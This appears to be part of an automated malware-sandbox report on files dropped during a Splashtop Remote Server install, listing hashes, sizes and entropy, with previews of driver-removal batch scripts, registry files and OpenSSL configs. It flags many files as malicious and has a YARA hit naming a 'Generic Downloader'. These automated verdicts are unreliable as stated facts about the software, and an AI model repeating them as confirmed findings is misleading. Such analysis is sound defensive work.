                                                                                                                                                                                                                                                                                                                                  SHA-512:56B936EFBD05D0906577754334D9B1A562AE0AD25574E22149C6BD97950FD73809A4EF1542D4D7CAA4E5B81DF53975FDB1D57381232F9B8D17A463F1E1A81859
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):164
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.75247427731045
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy/d/KiIKTAFshseJDo7EIbd/KiIKTA8vXto7EIl2YR41NDoC:/Ajs/dCiIc+JIIbdCiIevKIIlfRcGC
                                                                                                                                                                                                                                                                                                                                  MD5:6E5A084690CBEDCB4F74C1C365F2048E
                                                                                                                                                                                                                                                                                                                                  SHA1:379AF77A9066EE1EFEA1C17A21CF1C0AD7BF17FD
                                                                                                                                                                                                                                                                                                                                  SHA-256:F67BFB651037E84F5AE6965B5511FA1B9BD2C819B034A8284462AF01C0E0148F
                                                                                                                                                                                                                                                                                                                                  SHA-512:1ED233EF2BB513DCB9F3610AC36BBEB07259EAC7BA6F96E596B111C137F6B1BB35E1200ECAB3914925C6CCB80CD3A74ACEB40FA3775300151D34C7AB9C47A84F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe /r remove @HID\sthid* >> inst.log..utils\devcon.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd.exe /u sthid.inf >> inst.log
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):172
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.845091480099467
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy/dRLX/IKTAFshseJDo7EIbdRLX/IKTA8vXto7EIl3xR41NDo7n:/Ajs/dRLPIc+JIIbdRLPIevKIIlBRcG7
                                                                                                                                                                                                                                                                                                                                  MD5:C949FE57CE36D8C5FF18AD66A5C83138
                                                                                                                                                                                                                                                                                                                                  SHA1:BE891CE4AF8434FB3A439F7F0CB9EC3E17BDB99A
                                                                                                                                                                                                                                                                                                                                  SHA-256:8A5E292037FFC57F78E8C8D8AE945C319A41FABEB2112099BA3FFD9D08D4C1AA
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F22FB7C586852EF5EDB8A28250B4BAA2194FE7599E1EF0733554E512ADCC7326D625F67CACD21C06A3B9A8B43AAF7B8E23D1C529FCC1B36D3E983AF5384FC4B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe /r remove @HID\sthid* >> inst.log..utils\devcon64.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd64.exe /u sthid.inf >> inst.log..
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9728
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.7653420469834185
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:F+0YcUgZN/zSbTyB9Bs+VC+k5JEdVMNuE:F+oUgZN/zSbTysOC+k5MVs
                                                                                                                                                                                                                                                                                                                                  MD5:1EF7574BC4D8B6034935D99AD884F15B
                                                                                                                                                                                                                                                                                                                                  SHA1:110709AB33F893737F4B0567F9495AC60C37667C
                                                                                                                                                                                                                                                                                                                                  SHA-256:0814AAD232C96A4661081E570CF1D9C5F09A8572CFD8E9B5D3EAD0FA0F5CA271
                                                                                                                                                                                                                                                                                                                                  SHA-512:947C306A3A1EEC7FCE29EAA9B8D4B5E00FD0918FE9D7A25E262D621FB3EE829D5F4829949E766A660E990D1AC14F87E13E5DBD5F7C8252AE9B2DC82E2762FB73
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):10752
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.547294400796419
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yg/LSSz/NZS+cI818WJ6TPPeqj6wnzX/bHz3coD:yg/LSSz/NZSBITOg6+D/X
                                                                                                                                                                                                                                                                                                                                  MD5:F512536173E386121B3EBD22AAC41A4E
                                                                                                                                                                                                                                                                                                                                  SHA1:74AE133215345BEAEBB7A95F969F34A40DDA922A
                                                                                                                                                                                                                                                                                                                                  SHA-256:A993872AD05F33CB49543C00DFCA036B32957D2BD09AAA9DAFE33B934B7A3E4A
                                                                                                                                                                                                                                                                                                                                  SHA-512:1EFA432EF2D61A6F7E7FC3606C5C982F1B95EABC4912EA622D533D540DDCA1A340F8A5F4652AF62A9EFC112CA82D4334E74DECF6DDBC88B0BD191060C08A63B9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.654691319611147
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Qyk+SkWCiiCRroZ6IJlUAG+DZeMV4GGMVQIwchhyR12qv:Qy5hVZteAxDZBuGp/hUp
                                                                                                                                                                                                                                                                                                                                  MD5:AFB11B8A638A36856B635F9805BEC627
                                                                                                                                                                                                                                                                                                                                  SHA1:29E88479691D922698D1DAEC3F06EFD438CB90F1
                                                                                                                                                                                                                                                                                                                                  SHA-256:908EF8C0EEE73EFFAE7CA6AAEF29387302B1D69AEBE5EA587DEE7F1589F418D6
                                                                                                                                                                                                                                                                                                                                  SHA-512:1C929F635DF273BF7843A433C461761374E3CE8B2A41C479E2AA9B6A27F4CEF5CE78BAE8902EE99673E33E9E165333A1A4C09D8503F259809F282E6B4A15EBA9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Splashtop Inc.\Splashtop Remote Server] "StHidSupport"=dword:00000000
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows Registry little-endian text (Win2K or above)
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):288
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6709758888329973
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Qyk+SkWCiiCRroZ6IJlUAG+DZeMV4GGMVQIwchhyR12q8:Qy5hVZteAxDZBuGp/hU2
                                                                                                                                                                                                                                                                                                                                  MD5:4F4EC6847BC91FCFAC8BFE7840649CCE
                                                                                                                                                                                                                                                                                                                                  SHA1:642FB6860473391D28E1DC407A81B3829D048AFC
                                                                                                                                                                                                                                                                                                                                  SHA-256:CC4837A65AE43EDF3AA3FD2C77912A881694C43EE203A127CE27641455AC7AD3
                                                                                                                                                                                                                                                                                                                                  SHA-512:C896A60395237BED708C79CDBFF2FE9685E8B42A140EF96C2352559128B7700DFF8CA7267261A9EB5143583F296D0498C811E092516408B5500CC75DA8409C44
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
Preview:Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Splashtop Inc.\Splashtop Remote Server] "StHidSupport"=dword:00000001
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):77824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.995224286140262
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:3zrhT5+KybRpnE8K74kca7NerB8iXpYmRRXvdi82BSOe9oKSJ2SLD0BEZWkA:3+KY04RMmSCYmBiF4O7WT
                                                                                                                                                                                                                                                                                                                                  MD5:B40FE65431B18A52E6452279B88954AF
                                                                                                                                                                                                                                                                                                                                  SHA1:C25DE80F00014E129FF290BF84DDF25A23FDFC30
                                                                                                                                                                                                                                                                                                                                  SHA-256:800E396BE60133B5AB7881872A73936E24CBEBD7A7953CEE1479F077FFCF745E
                                                                                                                                                                                                                                                                                                                                  SHA-512:E58CF187FD71E6F1F5CF7EAC347A2682E77BC9A88A64E79A59E1A480CAC20B46AD8D0F947DD2CB2840A2E0BB6D3C754F8F26FCF2D55B550EEA4F5D7E57A4D91D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):81920
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.977706172799676
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:MP2K0pa0WfEYp9Y/XQhpgnbP212YCJpDhiF4O7W:MePOYe4bu1epDh8RW
                                                                                                                                                                                                                                                                                                                                  MD5:3904D0698962E09DA946046020CBCB17
                                                                                                                                                                                                                                                                                                                                  SHA1:EDAE098E7E8452CA6C125CF6362DDA3F4D78F0AE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A51E25ACC489948B31B1384E1DC29518D19B421D6BC0CED90587128899275289
                                                                                                                                                                                                                                                                                                                                  SHA-512:C24AB680981D8D6DB042B52B7B5C5E92078DF83650CAD798874FC09CE8C8A25462E1B69340083F4BCAD20D67068668ABCFA8097E549CFA5AD4F1EE6A235D6EEA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):207368
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.3782613062901925
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:aGvbxQU5Xxmg25YBu/QJWxAk0XbTqS9MC4bNzLT0pnn:PX80ZJF9wbNzLT0pn
                                                                                                                                                                                                                                                                                                                                  MD5:8020E8DA29CD91902771E1DC822BC4FC
                                                                                                                                                                                                                                                                                                                                  SHA1:9E2AEC7DAA4BA0C1D9B959CB9BA1915E819D7E2C
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E01A438780F09A281FB189C42CF3BC33BC1D2DF662015A9DE671A51A8D2FC82
                                                                                                                                                                                                                                                                                                                                  SHA-512:B12BC3C21A14318E980B4F91E070A99307D8F91EC24EEB4461E823CE1900ECB5F24C379C493674F82D9F69A4B09DEFC73D5A8DEB0C3FF6943FFBEDEAFA703A5E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):198608
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.465406905232138
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:mNvlfI7fn3+ksrtRYs5BZdHEsTznNZQtiF22W9bKReKn:+fMnuhrrYszTjTQtiF22WKl
                                                                                                                                                                                                                                                                                                                                  MD5:B51CB7BD99774F42D4FCD81522E159DA
                                                                                                                                                                                                                                                                                                                                  SHA1:815646C93E09F0DB23951F3D8CD7319240CDBD43
                                                                                                                                                                                                                                                                                                                                  SHA-256:55C8BEEBC29238A691AF1FDF44D922BDAC9B47034956311A9D467374049462C2
                                                                                                                                                                                                                                                                                                                                  SHA-512:3375489BC03A442775FB02C5AB1D264FF2A972A805179B9F860D1FF26F09E529DCF7D03EA18CF3D56FC1DD429423C344CBFC4B89F20158D84896AA257240796A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):561584
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5335413043485335
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:n+Uac7b2syTCmCZ9z7I6KxOYDkHlTiO+k86hiCivi:+UacGbC7bYgHlTi6eo
                                                                                                                                                                                                                                                                                                                                  MD5:A9A9D31764B50858A01B1FB228406F06
                                                                                                                                                                                                                                                                                                                                  SHA1:7A313C46F049287045992F54F9D6EDA9DB568EF8
                                                                                                                                                                                                                                                                                                                                  SHA-256:C0BABD7670124BB298D3BA6A8EE5AE33AD1030C08A18D8B8861F5D83003EB645
                                                                                                                                                                                                                                                                                                                                  SHA-512:164D5497AA91A5B4742A291F589400BC0B189AF946615A2F04E6CFD1ED598A542F7521E4DD79AAB99414846A3C391255309F911C247EF446A0483D9FAB6EFDFC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11479560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.352121129517374
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:QFLqnywIMoJDvZ4drfgYOfyg74bvnFCw4UnH:QFLqywhoJDadbk6HFUUH
                                                                                                                                                                                                                                                                                                                                  MD5:2EA6D3B8DEF550387EF986976A2C7302
                                                                                                                                                                                                                                                                                                                                  SHA1:7A0471A88819941FAA90C017593DE695FFE2CEB1
                                                                                                                                                                                                                                                                                                                                  SHA-256:D024B79B5B6DF6AC65A10A3E3D88266D4FBA17F5E1CDB9F9A4C0E276499741B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:545BD9203B3A1D762C29755DA4021565C85DFF12A49992BE98A17BB9A6C342CAD955A5CF1C4D572B654BE70CDC40F12B0C6BEE221ED23CB31EE311670EEE12E6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\choco.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1077592
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.435239338734592
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:n7PeeMxAg8KA6EhyC/H488sCGF8MBo9Bi8sROlu4VWKl6sEPdf8/2RYv:cxNEhyC/H488sLqMDIlu4Nl6suK2Re
                                                                                                                                                                                                                                                                                                                                  MD5:EEDA10135EDE6EDB5C85DF3BD878E557
                                                                                                                                                                                                                                                                                                                                  SHA1:8A1059DFD641269945E7A2710B684881BB63E8D2
                                                                                                                                                                                                                                                                                                                                  SHA-256:4B890DE3708716D81C1C719B498734339D417E8FFC4955D81483D1EBC0F84697
                                                                                                                                                                                                                                                                                                                                  SHA-512:A56BFC73537E36EFBA8E09FFD0B2F6BFC56BC4CB4FE90B52858C7AFD5D67DB23CCBA51C8097BEFE4ECB5082BA66C2B2612E2975EF3448252C48B97F41D12D591
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):592
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.220610311013542
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:oOtKAD4cL4jVpfWBzX2TShiucyfQ3W+/07T1raW1ijTofkVge1O0lgxErqM6n:ocKVg30ucSw07TNa97VgQ6erJ6
                                                                                                                                                                                                                                                                                                                                  MD5:E077993E994D28BBC7502681280C5551
                                                                                                                                                                                                                                                                                                                                  SHA1:9C3B360F9E81CCF8C8B56BE25E4CE9D67D1F61B4
                                                                                                                                                                                                                                                                                                                                  SHA-256:B8D539255FB1EA42EE3B06F0E314B037E35701E2B258272889D866DD3419526B
                                                                                                                                                                                                                                                                                                                                  SHA-512:B2FED3539BD94999F9F9A2CFEBAC6A3632212C10F3D97A5129E444FC548D1685877D0810790B71D342A4EF9080D1EFC73BF7A9493B5CCBD93232231EE2251ABE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:config_diagnostics = 1..openssl_conf = openssl_init....[openssl_init]..providers = provider_sect....[provider_sect]..fips = fips_sect..base = base_sect....[fips_sect]..activate = 1..install-version = 1..conditional-errors = 1..security-checks = 1..module-mac = 73:FF:87:A3:02:5E:E0:EE:AC:F3:E0:B1:9C:93:CB:FD:3D:05:93:39:98:A8:41:A4:EA:76:82:17:3B:38:E8:86..install-mac = 41:9C:38:C2:8F:59:09:43:2C:AA:2F:58:36:2D:D9:04:F9:6C:56:8B:09:E0:18:3A:2E:D6:CC:69:05:04:E1:11..install-status = INSTALL_SELF_TEST_KATS_RUN....[base_sect]..activate = 1....[algorithm_sect]..default_properties = fips=yes
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):697352
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.893951271183897
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:OB44g9qIIyg5RJbw/L5zQZVaOwZdTGJ5zk1m5GFsXvHOg9wlU7:OB44lIIygZb8L5zQyXZRdi2apwlU7
                                                                                                                                                                                                                                                                                                                                  MD5:68D8D459EE6A5027FFE35302B21D66FA
                                                                                                                                                                                                                                                                                                                                  SHA1:91299E1FF75B293A18105FBDFCB2CDE92A6C8507
                                                                                                                                                                                                                                                                                                                                  SHA-256:0EF5739FCC3850411E1DB6AF2E194E25C7E473BB950A387A7C851FE02660B4E8
                                                                                                                                                                                                                                                                                                                                  SHA-512:C032E6C057DA58374FF51B50B2146E4B27EB6A18A452668EB2C78E3F4E729399F303873A2DC40F5910826A4F23146DFB851B62DF3D5948A9039EC6ED23E53B32
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.40567624896974
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:ekfDaZOtK1FA1Jn4R7mvLvn4RYVXKCw/AFLr+TmNfOmZyJn:xiOtKADn4NmvDn42oCQG3+TJn
                                                                                                                                                                                                                                                                                                                                  MD5:A43B7D72B482D48804B377D8832C2693
                                                                                                                                                                                                                                                                                                                                  SHA1:B1598EFDA8E9863F520ABEF9AAA942C313C002FD
                                                                                                                                                                                                                                                                                                                                  SHA-256:9ACDE3809E2C02FE5D6C59153AEFFFE6628996EC5CFB7C2385865DCD1EC8BE7E
                                                                                                                                                                                                                                                                                                                                  SHA-512:F0777A8F79E70F8A12F531C3E77F5241E9ED46ACC6A1CBF06FF7A29D91EE281E4CD2A9C1832642992FE74D33B052670F85439E5925FDB7C44DE60014E53712DA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:config_diagnostics = 1..openssl_conf = openssl_init....[openssl_init]..providers = provider_sect....[provider_sect]..legacy = legacy_sect....[legacy_sect]..activate = 1
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):160776
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.897311739545073
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:M2uLSdBwPPvzj+2a7wQptIkcIWqmHT+BBI/gM6Z+a:Xum0PSwQptIXIWqyH4MO
                                                                                                                                                                                                                                                                                                                                  MD5:CF52DBEFBE8BC2DCD493CDBF050048E1
                                                                                                                                                                                                                                                                                                                                  SHA1:AED132B049C77FD77645D07B443E1B4E96CB5E51
                                                                                                                                                                                                                                                                                                                                  SHA-256:8080E398EDC43E652C0A104F62AD3C865E9BDC75C2E3936870DEAF43FEDBC3A4
                                                                                                                                                                                                                                                                                                                                  SHA-512:75133444A893002B9933EB3A44B66CD862FEDC9C05579B188EB250BBC3CC00C61533FB3AA58A1D9B89B45F83CFF8A3B02CB0FB605B299E0E7BACE13B99020207
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319762614553054
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:RdvQnJ9Cy5G4XmkRCXZ5YPPAq4SjIZUKzFrRjbuPp9Ao:Rdvby0lZ5YPPAq4SjIZUKLjbuPTj
                                                                                                                                                                                                                                                                                                                                  MD5:C90A5803A42C70747C15212288ED0A87
                                                                                                                                                                                                                                                                                                                                  SHA1:099B0B7A7C171DE82832E1C69E88A1DA32E5A532
                                                                                                                                                                                                                                                                                                                                  SHA-256:CDEB6F3D61FD5A0DCB3B2097CD1AC0C41A6D734905FC0F4F7AE89E458C4311AC
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9C28099E9D97F5FFC45DAA281224D060AA192D5D2C6F7FDF01D1A32063E3B044C2F0CC31BD78BB30F7C3668923CA37DBF4A5FBDEE348832649D4FE28617F18
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1326600
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.8708551072063875
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:U1RJO1z1sYP0y5EU9dt6VpjccWjqV9JSJkj+KuZzwBMwNG7RHHsi4+uC5:UtO11sYF5LGVyfqV/TyDZzsMEQw+uC5
                                                                                                                                                                                                                                                                                                                                  MD5:72D867E8C7A84374AA72BF7FECA4334E
                                                                                                                                                                                                                                                                                                                                  SHA1:BBE4C42BEB19A1F23BFBCFC5A67164D5EA29784E
                                                                                                                                                                                                                                                                                                                                  SHA-256:17D29B81FAEA714B5A93008711D92D1329B22244A2E9F56736064CAA4FD3CD84
                                                                                                                                                                                                                                                                                                                                  SHA-512:B523DF6FFE4A51180CDF2BDA761B01A521391A6B24E081309C33C91835C19BE96015B932D527822F5837802A979A3C48F5CC111892C47C082E8BCB8F2115AC3F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):374280
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.91728824512086
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:WYe2D4vE6mAQmh9ophnxdm2U6jpn99hURD+2XIG/jNsfowDmbpNsD5PK07OxI4ME:1DqqAQnvnxdmFopn98hR/jGnDOKSsNTY
                                                                                                                                                                                                                                                                                                                                  MD5:278D7F9C9A7526F35E1774CCA0059C36
                                                                                                                                                                                                                                                                                                                                  SHA1:423F1EBD3CBD52046A16538D6BAA17076610CB2F
                                                                                                                                                                                                                                                                                                                                  SHA-256:12177DAE5E123526E96023A48752AE0CB47E9F6EEAFC20960F5A95CA6052D1B8
                                                                                                                                                                                                                                                                                                                                  SHA-512:75F8C4856FB04B2D5E491F32584F0AAEFA0D42356E12320CBCB67DF48E59C7F644512C2C5146FD7791C2CCB770FD709A8D8E4C72EAFB74C39E1336ACCB49A044
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):623056
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.452703221703766
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:vcqfl06LEuieb/drb93hVzyp5dl+lyyMKhoRZhD9ZKck9Qh/5Ffdw0CnbHu9gJJt:kqdFzbFrbUp5dl+lyyMKhoRZhD9ZKckB
                                                                                                                                                                                                                                                                                                                                  MD5:B03D660319962C265C8A5E6F89CD019D
